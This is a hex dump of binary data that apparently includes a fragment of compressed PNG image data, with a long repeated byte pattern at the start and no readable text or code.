01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc041abda6cb3
cd62e2c4893174e850c5000000a0682a22a25e19680d7beeb967dc7cf3cd
d1bf7fffa8a9a989c30f3f3c66cd9aa530000000b498191cb48a934e3a29
eebbefbee8dfbf7f4444f4eedd3ba64e9d1ad5d5d58a030000408b99c141
c99d7beeb9316edcb846d7bdf8e28b71c82187c4dab56b150a00008066ab
8c880b958152a8a8a8881ffde84771eaa9a736d9668b2db6885ebd7ac593
4f3ea96000000034ff376898c14109545656c64f7ef293183d7a7441ed8f
3aeaa898316386c2010000d02c020e8aae53a74e71c30d37c4a851a30ade
66ce9c393162c48858bd7ab50202000090995b5428ba0b2fbc308e3efae8
4cdbf4e9d3273efcf0c3f8e31fffa880000000646606074575f2c927c7c5
175fdcac6dd7ac591323468c8837df7c5321010000c8c46b62299afdf7df
3f264e9cd8ecedbb74e9d2a2ed010000e8b8cce0a02876df7df7b8efbefb
a27bf7ee2deeeb4b5ffa52bcf2ca2b8a0a000040c1cce0a0c5b6da6aabb8
e38e3b8a126e44448c1b374e51010000c8c40c0e5aa453a74e71df7df7c5
5e7bed55b43eebeaeae2339ff94ccc9f3f5f8101000028ecf7a912d012a7
9f7e7a51c38d8888cacaca38edb4d314170000808299c141b3edbaebaef1
c8238f44555555d1fbaeadad8d3df7dc33962c59a2d0000000e4650607cd
d2ad5bb7b8fefaeb4b126efca7ffaf7ffdeb0a0d00004041041c34cbf9e7
9f1fdb6fbf7d49f7316ad42885060000a020020e32fbc217be10dff8c637
4abe9f3df6d823aaabab151c000080bc041c6452555515975e7a69d1fb5d
ba7469a3cbcde2000000a010020e3239f6d8638b3eabe299679e89cf7dee
73b168d1a206eb0e39e41045070000202f010705ebd1a3479c79e69945ed
f3a1871e8a238f3c32162f5e1c53a74e6db07ec89021b1dd76db293e0000
0039093828d837bff9cdd86cb3cd8ad6df33cf3c13e3c68d8b356bd64444
c4e4c993a3bebee15b8bcde2000000201f010705e9d3a74f8c1d3bb668fd
2d5dba34c68e1d1b757575ff5df6d65b6fc5ac59b31ab41d316284010000
002027010705f9d6b7be15bd7bf72e5a7f679e7966bcf3ce3b0d963ffef8
e30d967de2139f88ae5dbb1a040000009a24e020affefdfbc749279d54b4
fe6ebbedb646838c888869d3a63558565555159ff8c4270c040000004d12
7090d7d8b163a35bb76e45e9ebdd77df8dcb2fbfbcc9f5b366cd6a7466c7
9e7bee692000000068928083dc1748a74e316ad4a8a2f5f7d39ffe343ef8
e0839c6d1a9bdd21e000000020e7ef57252097bdf6da2bfaf7ef5f94bede
78e38d9832654ade768d051cc3860d33180000003449c0414e23478e2c5a
5f3ffad18f62ddba7579db3dfdf4d3b16ad5aa0d966db2c926b1edb6db1a
100000001a25e0a04995959571f0c10717a5af679f7d361e7becb182daae
5ebd3a5e7cf1c506cb3ff5a94f19140000001a25e0a0497befbd776cbae9
a645e9eba28b2ecad4fe95575e69b06c8f3df63028000000344ac041930e
39e490a2f4f3c8238fc473cf3d97699b975f7eb9c1b28103071a14000000
1a25e0a0519d3b778e830e3aa8c5fdac5bb72e2ebdf4d2ccdb35368363ab
adb63230000000344ac041a3f6d9679fe8dbb76f8bfbf99ffff99f78f3cd
37336ff7da6baf457d7dfd06cb060c186060000000689480834615e3819e
2b56ac88abaebaaa59dbae5ebd3ade7ffffd0d9675efdebd28a10b000000
ed8f808346edbaebae2deee3a69b6e8ac58b17377bfba54b973658e63615
0000001a23e0a05143860c69d1f66bd7ae8d5ffef2972dea63d9b2650d96
b94d05000080c6083868a04f9f3e2d0e121e7ae8a158b264498bfa682ce0
308303000080c608386860f0e0c12deea3a5b33722223ef8e08306cb041c
0000003446c04103fdfaf56bd1f6b366cd8ae79e7baec5c7d1d80345051c
0000003446c041032d7d53c9a449938a721c9b6fbe7983659ec101000040
63041c34d092191ccb962d8b071e78a028c7b1d9669b3558d6b3674f0304
00004003020e1ae8d3a74fb3b7bdfbeebba3b6b6b6c5c7d0a54b97e8ddbb
7783e59d3b7736400000003420e0a081cacaca666d575f5f1f77de796751
8e61bbedb62beab1010000d0be09386860e5ca95cdda6efaf4e93167ce9c
a21cc3fefbefdfe87201070000008d1170d04073038e62bc1af63f0e3cf0
c04697bb4505000080c6083868e0830f3ec8bccddcb973e3c9279f2ccafe
b7da6aabf8f8c73fdee83a01070000008d1170d0407366704c9e3c393efc
f0c3a2ecffa0830e6a729d5b54000000688c8083069a13703cf6d86345d9
778f1e3d62ecd8b14dae1770000000d01801070d64bd4565ce9c39f18f7f
fca328fb1e3f7e7cf4efdfbfc9f5020e0000001a23e0a081ac3338a64d9b
5694fd6ebdf5d671da69a7e56ce3191c0000003446c041035967703cfef8
e345d9ef79e79d175dbb76cdd9a658cff9000000a07d1170d04096191c35
3535f1a73ffda9c5fbdc73cf3d63d4a85179db2d5ab4c800010000d08080
8306de79e79da8afaf2fa8edf4e9d363ddba752dda5f4545454c9c38b1a0
b6fffad7bf0c100000000d08386860f5ead5b170e1c282da16e3f91b871d
76587cf2939f2ca8ed82050b0c100000000d083868d49c3973f2b659b76e
5d4c9f3ebd45fbe9d1a347fce0073f28b8bd8003000080c6083868d4dcb9
73f3b6f9f39fff1c3535352ddacfb871e372be16f6a3041c0000003446c0
41a30a09385e7ffdf516ed63abadb68ad34f3f3dd3369ec1010000406304
1c34aa905b54962f5fdea27d5c79e595d1ad5bb74cdb98c1010000406304
1c346adebc7979dbb424e038eeb8e362c4881199b71370000000d098ce4a
40630a99c1b16cd9b266f53d70e0c0b8e0820b326fb766cd9a78efbdf70c
0e0000d0aa2a2a2a9abd2c6bdb42b75fb76e5d7cf8e18706673d028ef5ec
b4d34eb1e38e3bb6ca855baaed5bfa615a7f796d6d6dce5b4876df7df7e8
dcb973a67d555454c4983163a2478f1e99c767c1820571e2892796e45ccb
655ccbe10f6a29f695a55d4ae79ad27595ca35e85cdbe7e7adadc7aa5ccf
b51463d5debe8b3857df457c17f15da45c3e03e5e8e4934f8e471f7dd40f
f9f5c73422ea95e1df264c981013264c5008000000cada29a79c128f3cf2
8842acc70c8e2259bc7871a3b76cd4d7379e1f65599eb58fa664edbbbaba
3a7af7eedd647f0b162c88c58b17177c8cddba758b1d76d8a1d949e9ecd9
b3e3fdf7df6fd6f9b7c538a430c6e55c9354c732eb3e8b719e298c71b9d4
dbe7358cb1cfabb1ec40df178cb1b16c0fdfa13af2f7fb030e3820c68d1b
d7e4fa4e9d3c5253c05122d75d775ddc72cb2dedea9cbef7bdefc599679e
d9e4fa7befbd37aeb8e28a82faaaaaaa8adffef6b7cd0e37d6ac59135ffe
f29763f5ead52e360000a0dddb69a79d72ae4ffd169b5210f9d0a4bffded
6f39d7f7e9d3a7e0bece3aebac18326448b38fe52f7ff98b70030000e830
f23d40d40c8e466aa2043465d6ac5939d7f7eddbb7a07ef6d8638ff8d6b7
bed5a263f9e31fff68400000800e43c0919d8ad0a4b7df7e3be76b590b99
c1d1ad5bb7b8f6da6ba3b2b2b245c73273e64c030200007418f99ed721e0
68a4264a402eb96671545757e7ddfebcf3ce8b8f7dec632d3a8655ab56c5
0b2fbc60300000800ec30c8eec54849c723d87a3baba3aba76eddae4fae1
c387c737bef18d161fc3cc993363eddab506030000e830f2cde0f090d186
041ce4942be0e8d4a95393b33336d96493b8e69a6b8af2a1bbf3ce3b0d04
0000d0a1e49bc1d1d2c700b447020e72caf7a0d1edb7dfbed10fda8d37de
185b6eb9658bf73f67ce9c983e7dba810000003a14b7a864a722e4346fde
bc58be7c7993eb1b0b38ce39e79c183e7c7851f67fc71d77e49d9a050000
d0de78c868762a425eb966717c34e038f8e08363ecd8b145d9efaa55ab62
ead4a906000000e870cce0c84e45c82bd77338d60f38060f1e1c575d7555
d1f67bfffdf7474d4d8d010000003a9c7c0187878c36d45909c82757c0b1
dd76db4565656574efde3d6ebffdf6e8d9b367d1f63b69d224c50700003a
243338b25311f2ca157074e9d225aaababe3aaabae8ac18307176d9f7ffa
d39fe295575e517c0000a043127064a722e43577eedc9cb78a5c7ef9e571
f0c10717759f37de78a3c20300001d96878c66a72214f4c17ae9a5979a5c
bfefbefb16757f4f3df5544c9b364de10100800efd3b2ce78f790147c39a
280185c8759b4a31ad5bb72ece3fff7c050700003a34b7a864a7221424d7
ab628be9f6db6f8fd9b3672b380000d0a10938b253110ad21a3338162f5e
1c3ffbd9cf141b0000e8f0041cd9a9080579f3cd3763c58a1525ddc7a597
5e9af361a60000001d8580233b15a1e00fd7cb2fbf5cb2fe5f7cf1c5b8e7
9e7b141a0000203c64b439548482bdf2ca2b25fbe09e77de79793fc00000
001d45be191c1515158af411020e0a3264c89038ecb0c34ad2f74d37dd14
cf3fffbc22030000fc3fb7a864a722e43568d0a09832654af4ead5abe87d
bff8e28b71d9659729320000c07a041cd9a90839f5efdf3feeb9e79ed86c
b3cd8adef7fbefbf1fa79f7e7aac5dbb56a1010000d623e0c84e4568d2c6
1b6f1c53a74e8d6db6d9a624fd7fef7bdf8bb973e72a34000040d61ff302
8e863551021ad3bd7bf7b8ebaebb62a79d762a49ff53a74e8d071f7c50a1
0100001a610647762a420355555571ebadb7c6d0a1434bd2ffebafbf1ee7
9d779e420300003441c0919d8ab0818a8a8ab8e69a6b62c4881125e97ff5
ead571da69a7c5aa55ab141b0000a009028eec54840d5c72c92571e8a187
96acff73cf3d37fefef7bf2b340000400e028eec3a2b0111ff9eb971e9a5
97c609279c50b27ddc78e38d3165ca14c5060000c8235fc0515151a1481f
21e0203a75ea143ffde94f63f4e8d125dbc7238f3c12975c728962030000
14a0bebe3eefef383624e0e8e81740e7ce71edb5d796f4b694e79f7f3ec6
8f1f9ff7030a0000c0bfb945a519bf6f95a0e3aaaaaa8a1b6fbc310e3ae8
a092ed63debc7971e28927466d6dad8203000065a5b1db3c9abaf5a358cb
0b6ddbb973ee9feb028e86041c45326cd8b058bd7a759b7f080a5d5e5555
15a3478f8e1d76d8a16435a9adad8d871f7e380e3ffcf0669f63d6f32ce5
1fa3721dcb72ac4929cfb39c6a552eff50a63ac6a97e5edbdb18fbbc1a4b
636c8cfd1be33b6147f84ed81e0938041c253372e4c8183972a442aca75b
b76e3176ec58850000002832014743028e2259bc78712c5bb6acc1f2c69e
3bd1d4b3285adab629ebb7ada8a888810307468f1e3d4a5a8f79f3e6c5d2
a54b4b5e872cb569cdb128d7732b87f3cd726ea98da5736bfde33596cead
bd9d9b7fefdad7b9f90ca6f73dc567d0b995d3f794be7dfbc6bdf7de2be0
1070b4beebaebb2e6eb9e596b23ec6debd7bc79429534a1e6e44441c7cf0
c1b164c9121706000040336cb2c92639d70b381aa98912740cfdfaf58bfb
eebb2ff6d8638f56d95f6bed070000a03df21695ec54a403e8ddbb77dc7b
efbdb1ebaebbb6da3e870f1faef0000000cd24e0c84e45dab96eddbac51d
77dc11bbecb24babee57c0010000d07cf99e2dd291de18532801473bd6b9
73e7b8e9a69be2d39ffe74abef7ba79d768a4d37ddd4200000003483191c
d9a9483b555151113ffbd9cf62bffdf66bb3fd9bc5010000d03c028eec54
a49dbaf0c20be3b0c30e2be93e66ce9c193535354daedf77df7d0d040000
40330838b253917668fcf8f171ca29a794741fcf3df75c9c78e289f1d7bf
feb5c936020e000080e6c917705456562ad2470838da992f7ef18b71f6d9
6797741fafbefa6a1c7becb1b172e5ca78fef9e79b6cb7f5d65bc7a04183
0c0a000040461e329a9d80a31d19387060fcfce73f2fe9853e77eedc38fa
e8a363f9f2e51111f1c20b2fe46cef391c000000d9b945253b156927ba75
eb16b7de7a6b6cbcf1c625dbc7a2458be2a8a38e8a850b17fe7759be80c3
6d2a000000d90938b2539176e2f2cb2f8f21438694acff9a9a9a38eaa8a3
62ce9c391b2c7ff7dd77e3adb7de6a72bb7df6d9c7d4290000808cf2dda2
22e068a4264a90bee38f3f3e8e38e28892f55f5b5b1bc71f7f7cbcfaeaab
8daecf358ba35fbf7e250d5e000000daab5cb338041c8dd44409d2b6c71e
7bc4c5175f5cb2fed7ad5b17a79e7a6afcf9cf7f6eb28ddb540000008a2f
57c061a67c43028e8475e9d225aebdf6daa8aaaa2a49fff5f5f571e69967
c6134f3c91b35dae37a94478d028000040737f9335f963de0c8e86355182
748d1f3f3e3ef6b18f95acff1ffef08771fffdf7e76d376bd6ac58b76e5d
93ebf7da6baf928530000000ed555d5d5dd33fe6051c0d6ba20469da76db
6d63fcf8f125ebffe73fff79dc76db6d05b55db56a55bcf6da6b4daeefde
bd7b0c1d3ad4a00100006490eb1695caca4a05fa080147a2aeb8e28ae8d2
a54b49fafefdef7f1f975f7e79a66df2dda6e2391c000000d9780647369d
95203d5ffbdad74af65c8b37df7c33c68d1b97f79dcb1ff5fcf3cfc771c7
1dd7e4fae1c387c78f7ffce38888d864934d62cf3df78c5d76d925faf5eb
177dfbf6dde0fff7e9d32756ae5c194b962c89c58b17c7e2c58bfffb9fe7
ce9d1b3366cc8865cb96b91000008076cd5b54b2117024a677efde71e185
1796a4ef0f3ef820bef18d6f444d4d4de66d5f7cf1c59ceb77db6db7f8d9
cf7e169ffad4a70a7a6e48cf9e3d63f3cd376f745d5d5d5d3cfbecb3f1f8
e38fc7b469d3e28d37de7061000000ed8e878c6623e048ccb9e79e1b9b6e
ba69493e38679c7146bcfefaebcdda7ef6ecd9b162c58ae8d9b367a3ebbb
74e912471e7964518eb5b2b232f6da6bafd86bafbde2fcf3cf8f37df7c33
1e7becb1b8f9e69b63e1c2852e120000a05d3083231b1549c8a04183e298
638e2949dfd75c734d3cfae8a32dfae0e59bc5512adb6ebb6d9c7efae931
73e6cc183f7e7cc99e4d020000d09a041cd9a848424e39e594925cc44f3c
f144fce4273f69f6f615151571c41147c4e0c183dbb43e1b6db4519c73ce
393163c68c38f0c0035d30000040d2041cd9a8482236de78e3183d7a74d1
fb7df3cd37e35bdffa56e6878afec72ebbec120f3ef8605c7df5d5b1c516
5b9445ad060e1c18b7dd765bdc7befbdb1f3ce3bbb7800008024798b4a36
028e441c77dc71d1a3478fa27f58ce38e38c663d54b457af5e71f1c517c7
ef7ef7bb18366c5859d66cf8f0e1f1d8638fc511471ce10202000092e321
a3d9a84802aaaaaae2e4934f2e7abf37df7c733cf7dc7399b7fbea57bf1a
4f3ffd749c7cf2c951595959f6b5bbfaeaab63c284092e24000020296e51
c946451270c8218744fffefd8bdae73ffff9cfb8f2ca2b336d5359591997
5e7a695c7ffdf54dbec2b55c4d983021aebaeaaaa8aaaa724101000049c8
157094fbffd8dc16041c091833664cd13f24dff9ce77a2b6b6b6e06d7af7
ee1d77dd75579c78e289c9d671f4e8d171d75d7745af5ebd5c54000040d9
f30c8e6c041c656ef8f0e13164c890a2f679fbedb7c7b3cf3e5b70fb8103
07c66f7ef39bf8dce73e977c3df7dd77df78e081078a3e23060000a0d8dc
a2928d8a94b9af7ef5ab45ed6fce9c3971d9659715dcfed39ffe743cf2c8
23b1fdf6dbb79b9aeebcf3cef1cb5ffe32ba75ebe602030000ca96878c66
d35909ca5bb1674d7cf7bbdf8d55ab5615d4f6939ffc644c9d3ab55d0601
bbedb65b5c75d55571fae9a7bbc80080926b6a2a793196679da65e8cbedb
e27c8a719ee574dcc538cf148ebb3d5db36d3196b99e2128e0107094cc81
071e18db6cb34d513f041b6fbc710c1830a068c7387ffefc18356a548c1a
352aefb1f4ecd9330e38e080763dcbe190430e89c18307c7dffffef776fd
8f5639fdf1f78f56fbf96292ea172d636c8cfd30f26f4c5bfd8d00283601
47237f9723a23b29086400002000494441545e19fe6dc284095e270a0000
40d95bb87061ecbefbee0ab11e33388ae4d5575f8db973e73658ded83d53
4ddd47f5d1e5c3860d2bdac330e7cf9f1f2fbcf042de6388f8f77337b6d8
628b0e33766bd7ae8dc71f7f3c962d5b5694712b65dba694e2185afb7cb3
d4a05cc7c7b975cc733396cecdb915ffdf95f6fc19f4f7c5b9b94e9d5b96
b64f3cf1446cb7dd768db6378343c0513277df7d77dc72cb2d45ebafaaaa
2a5e79e595a2fd803ffcf0c363debc7979db4e9c38b143851bffa9f5aebb
ee1a5ff8c21762e5ca952e660000a02cd4d5d535b94ec0d1484d94a03c0d
1d3a3436da68a3a2f475d75d7715146eecbdf7de71ca29a774c87a575757
c719679ce1c2030000ca46aed7c45656562ad0470838cad4673ffbd9a2f4
b372e5cab8faeaabf35f089d3ac5c489133b74cd4f3bedb4183468908b0f
0000280b5e139b8d8a94a962bd1ef6de7bef8d77df7d376fbbd1a347c7ae
bbeedaa16bdea54b970e1ff2000000e523d70c0e6f726a48c051a676da69
a7a2f43379f2e4bc6d7af6ec19679f7db6a247c47efbed175ffce2171502
00006873b9020e33381aa98912949f5ebd7a45f7eedd5bdccf5ffffad778
f9e597f3b6fbf6b7bf1d9b6db699c2ffbf8b2eba28aaaaaa140200006853
028e6c54a40c6dbef9e645e967ca942979db6cb9e5961df6c1a24dd976db
6de3d4534f55080000a04d0938b2f19ad832d4bf7fff16f7b172e5caf8f5
af7f9db7dda851a3a24b972e6d729eafbefa6adc7aebad515d5d1d03070e
8ceaeaeaa8aeae8e4d37ddb4cdc760cc983171f3cd37c7dab56b5d900000
409b10706423e02843c5b85de4a1871e8a152b56e46d77f0c10717fdf8eb
eaeae2c9279f8cbe7dfbc6d0a1439b6cd7a74f9f983a756a83e583060d8a
638e3926468f1edd6661c7a69b6e1a071c7040fce637bf71410200006d22
d75b543c64b421914f192ac60c8e427e98f7efdf3f670091d5bc79f3e2ca
2baf8c3df7dc338e3ffef878ecb1c772b6df72cb2da367cf9e0d96cf9933
277ef4a31fc5d0a143e3d4534f8da79e7a2ae707bb548e3bee3817230000
d066cce0c84645ca504b9fc1b176edda78e69967f2b63be8a0838a92facd
9a352b8e3cf2c8d87befbde3eaabaf8e77de792722225e7ffdf5bcdbeeb0
c30e39cfe3e1871f8e238f3c323ef399cfc4e38f3fdeaae3b0cf3efbc4a0
41835c900000409b107064a32265a8a501c75ffef29758b56a55de76071e
78608bf653535313e79e7b6e1c74d0418dceb278edb5d7f2f6b1fdf6db17
b4afb973e7c689279e1813274e6cb5e762545454c4b1c71eeb82040000da
44ae802342c8d1a01e4a507e5a7a8bcad34f3f9db74dbf7efd62efbdf76e
f63e7efffbdfc7673ffbd998346952d4d5d535da66fefcf9b172e5ca9cfd
e49ac1f151f5f5f571d34d37c521871c12f3e6cd6b95b1183d7ab457c602
00006d42c0918d6a94a196cee02824e0d86fbffda2b2b2b259fd5f7bedb5
71c20927c4a2458b72b6abafaf8fd9b367e76c9325e0f88f175f7c31befc
e52fb7ca034037d9649338e080035c94000040abcbf72c420f1add9080a3
9d79fffdf7e3c5175fccdb6edb6db7cddcf7dab56b63cc983171f9e597e7
4d12ff23df6d2acd093822fe7d7bcc983163e2eebbef2e794df7d9671f17
160000d0eacce0c84635cad0e2c58b9bbdeddffffef7266f19595fdfbe7d
33f77de18517669e3591ef41a35b6fbd75f4e8d1a3d9e77bf6d967c773cf
3d57d2f1d8638f3d5c94000040ab137064a31a6568c99225cddef68d37de
28a85d9f3e7d32f57befbdf7c6a44993321f4fbe191c1515153178f0e066
9fef9a356be29bdffc662c5cb8b064e3b1d34e3b45f7eedd5d98000040ab
127064a31a65a82501c73ffef18f82da6599c1f1b7bffd2dbefffdef37eb
780a79934a736f53f98f850b17c6c9279f1c6bd6ac29c97874eedc3976db
6d3717260000d0aa041cd9a846196ac92d2ac50e38962c5912279f7c72ac
5ebdba59c7f3f6db6fc7071f7c90b34d4b038e8888e79f7fbed9214c21dc
a6020000b4360f19cd46c05186cae91695091326c4db6fbfdda20f64bee7
701423e08888b8e79e7be2f7bfff7d49c644c0010000b4b67c014773df8c
d95e0938ca507367707cf8e1873177eedc82daf6eedd3b6f9b79f3e6c5e3
8f3fdee2f329d59b541a73d34d3795644c76df7d7717260000d0aadca292
8d6a94a1f9f3e7376bbb152b56c4ba75eb0a6abb74e9d2bc6da64c999237
312c44be80a3baba3aba76ed5a94dacd9c39335e7ef9e5a28f49d687b202
0000b49480231bd528432fbffc724101c4472d5bb6ace0b6f3e6cdcbb97e
ddba7571cf3df714e57cf2051c9d3a758aedb6dbae68f52bc52c8e2e5dba
b8300100805625e0c84635caf4227efae9a7336fb77cf9f282dbe69b25f2
c4134f14edd5abadf12695f53df8e083f1ce3bef14754c2a2b2bdddf0600
00b42a0f19cd46c051a666cc9891799b2c0147be6775fcf6b7bf2ddab92c
58b020de7ffffd9c6d8a1970ac5dbb366ebbedb6a28f89591c0000406b32
83231bd52853cd09388a798bca82050b8a7a3eadf52695ff983c7972519e
1fb23e01070000d09a041cd9a84699fad7bffe15b367cfceb44d5d5d5dc1
6df3dda252ec5b3ce6cc9993737d319fc111f1efb0a725afb76d4cb11e84
0a00005008014736aa51c6b2cee2e8d7af5fc16d67cf9e9df38d2b8b162d
2aeab9e4bb25669b6db6297afd0a79f647a60f8b3f1e0000402b127064fc
cda604e5ebc9279fccd43e4bc051535313cf3cf34ca3eb56ad5a95f79919
59e5bb25a6478f1eb1c9269b14759fc50c38d6ad5b178b172f7651020000
adc64346b3117094b1a79e7a2ad36d1659028e888869d3a6b5da8724df0c
8e88e2cfe2c8f7dc8f2cde7aebad9c335e0000008a2ddf0c0e6f7adc9080
a38cd5d5d5c51d77dc5170fbac33209a0a38ba75eb169b6db65951cfa590
80a3bababaa8fb2ce60c8e7ccf100100002836b7a864d35909cadb942953
e2bbdffd6e416ff0e8d2a54b6cb4d146f1c1071f14d4f7bc79f3e2d5575f
8d9d77deb9c1ba6db6d926de7df7dda29dc7c2850b63cd9a3539cf63ebad
b72e6aed66cf9e1df5f5f5459991f2e69b6fba1801801669ec3b4953df53
8ab5bc547d97f2b88b718e299f4f6b8f655b5d9baed9c2daf7e9d347c021
e0687d071e7860a3b75814e303336fdebc183c787041c771f5d55737f9ac
88c6fa6eeab68bb3cf3ebbd1590b2d399fdadada9c01c791471e19db6fbf
7d51bf24ac5cb93236da68a3168fefd0a143e3faebaf4ff28f7939fd91ef
c85f40523e9f8efc05c418fb92e98751c7fa37a6d4d71540b1f93bf4917a
4444bd32fcdb84091362c284090a01000040d9db6fbffde2e5975f5688ff
67064791bcf4d24bf1c61b6f3458ded8536f9b7a126eaeb623468c28e821
a24b962c89e9d3a7673a86bdf6da2b060e1cb8c1faa54b97fef7191dcd39
dec696efb9e79eb1c30e3b3479ec353535f1d0430f15ad661111871d7658
f4ecd9b3c5e37bcf3df7c48a152b8a5287d66adb94723dde2cdb67a9414a
e7ebdcd23db7f6fa19cc726eae53e7e6dcd2f9fb622c9d9b736bdb73cbb2
fd65975d16279c704293c7e21615014749fcea57bf8a5b6eb9a564fd7ff5
ab5f6df21689f5f5eddb372eb8e08258b66c59c17defb8e38e317dfaf40d
a637f5eddb377efce31fc7bffef5afa29dc3983163e2820b2e68727dd7ae
5de3fbdfff7ea63f2ef98c1c39b2c501c7ebafbf1edff9ce775ce4000040
abf290d16c5423110f3ef860bcfaeaabf907b453a7f8ec673f9ba9efd75e
7b2d1e7becb106cbf7df7fffa29e43be37a974edda3536df7cf3a2eeb347
8f1e2dee63c68c192e400000a0d5e5fb1f7f051c1fa98712a4e1c30f3f8c
8b2fbeb8a0b623468cc8dcffd5575fdd60d949279d54d4f72a17f2aad862
be4965c08001d1bd7bf716f723e0000000da425d5d5dee1ff4028e0deba1
04e9f8c31ffe104f3df554de76fbedb75fe61ff6b366cd8ac993276fb06c
bbedb68b430f3db468c73f7ffefcbc6daaabab8bb6bfdd77dfbdc57dac59
b326fef77fffd7c5070000b43ab7a864a31a89b9e8a28bf25ee4fdfaf58b
e38f3fbe597dbffdf6db1b2cfbfef7bf5fd0c34d0bb162c58a58b26449ce
36e51670fcf9cf7f8e55ab56b9f00000805627e0c8463512f3ca2bafc47d
f7dd97b7dde9a79f1eddba75cbd4f7fbefbf1fdffdee773758b6f5d65bc7
19679c51b4e39f376f5ecef5db6cb34dd1f6558c80e3fefbef77d1010000
6dc23338b2518d045d71c515515b5b9bb3cde69b6f1ec71e7b6ce6be67cc
9811b7df7efb06cb962e5d5ab463cf1770146b0647f7eedd63b7dd766b51
1f8b172f16700000006dc63338b2518d042d58b020aebbeebabcedc68d1b
175dbb76cddcff0f7ff8c3b8e79e7bfefbdfdf7aebada21d7bbe078d16eb
21a35ff9ca575afc06953beeb823d6ac59e382030000da44be5b542a2a2a
14693d028e445d77dd75f1b7bffd2d679bfefdfbc731c71cd3ac0fd18409
1362d2a449b166cd9a06cfe568897c01c7565b6d559414f2c8238f6cd1f6
6bd6ac893befbcd385060000b419cfe0c8463512b56eddbaf8f6b7bf9d77
86c1f8f1e363e38d376ed607e9dc73cf8d214386c40b2fbc50b4e3ce778b
4a5555556cb1c5162ddac7a0418362afbdf66a511fbffef5afe3dd77df75
a10100006d46c0918d6a24ecb5d75e8b2bafbc32679bfefdfbc7d5575fdd
ec7d7cf0c107b17af5eaa21d73be191c112d7f0ec7e8d1a35b34556bedda
b571c30d37b8c00000803625e0c8463512f78b5ffc22fef297bfe46cb3ff
fefbc7a9a79e5a16c7bb60c18258bb766dce362d79934aaf5ebd9a755bce
fa7efef39fc7ecd9b35d5c0000409b127064a31aede0823fe38c3362d5aa
5539db9d7beeb945796d6a4bd5d5d5e57da6474b66704c98302136dd74d3
666f3f7bf6ec16cd7801000028e6efbd9c3fe8051c1bd64309d23767ce9c
38fffcf373b6a9aaaa8a5ffce217d1bb77ef363fde7ccfe168ee9b5476dc
71c738e9a4935af4c7e3acb3ceca3bc3040000a035784d6c36aad14e4c99
3225264f9e9cb3cd36db6c5316b313f23d8763c08001cdeaf7e28b2f8ece
9d3b37fbb8264d9a14cf3df79c8b090000280bf5f5f5b97fd00b3836ac87
12b41f3ff8c10fe2f9e79fcfd9e680030e884b2eb9a44d3f08f9028ee6dc
623272e4c8183e7c78b38fe9a5975e8acb2ebbcc45040000940db7a864a3
1aedc8dab56be39bdffc66ded79b9e74d24971e38d3746972e5ddae438f3
dda2b2d9669b65ea6fc71d77ccfb36995ce6cc9913c71c734cac5cb9d245
040000940db7a864a31aedcc3befbc1363c68c8975ebd6e56c3772e4c898
3a756a9b3c9323df0c8e7efdfa15fc41dd6aabad62ead4a9b1f1c61b37eb
58162e5c18471e7964de50080000a0b5e59bc1515151a148eb1170b443cf
3cf34c9c73ce3979efd7da7befbde3d7bffe756cb1c516ad7a7cf9028e4e
9d3a45bf7efdf2f6d3b76fdf983a756ab38fbfa6a6268e3efae8bc334a00
0000da82677064a31aedd4e4c993e3dc73cfcddb6ee79d778e871f7e3876
d86187563bb69a9a9a58be7c79ce36f96e53e9debd7bdc79e79d3178f0e0
661dc38a152be284134e88575f7dd5c50200009425cfe0c84635dab15ffe
f29705851c03060c88dffce6373166cc98a8aaaa6a95636bc98346070c18
1053a64c89a14387366bdf73e6cc89af7ce52bf1a73ffdc945020000942d
cfe0c84635dab9499326151472f4ead52b2eb8e08298316346ecbffffe25
3fae7c01475333380e3df4d0983e7d7a7cfad39f6ed67e67cc9811071e78
60bcfefaeb2e0e0000a0ac99c1918d6a740093264d8af3ce3bafa0b68306
0d8a499326c5af7ef5abd865975d4a764cf3e7cfcfb9fea333387af7ee1d
37dc7043dc70c30dcd7e30ea4d37dd14c71e7b6cdedb63000000ca818023
1bd5e8206ebffdf638fffcf30b6ebfcf3efbc4b469d3e2273ff949e6d7b6
1622cb0c8ecf7ffef3f1e4934fc6a1871edaac7dd5d4d4c4f8f1e363e2c4
8979a778010000940b0147369d95a0e3b8edb6dba2a2a2222ebae8a282da
77ead4298e3efae8f8fad7bf1e4f3df554fcee77bf8b279e7822162d5ad4
e263c917700c1e3c384e3bedb438eaa8a362fbedb76ff67e1e78e081b8f0
c20b8b72cc000000ad49c0918d80a383b9f5d65be3fdf7df8f8b2eba287a
f5ea55d0365dbb768dfdf6db2ff6db6fbfa8afaf8fe79f7f3ea64d9b16d3
a64d8bd75e7bad59c7f1eebbefe65cbffffefbb7e85920fffce73fe3ecb3
cf8e9933671a7400002049028e6c041c1dd03df7dc134f3df5545c71c515
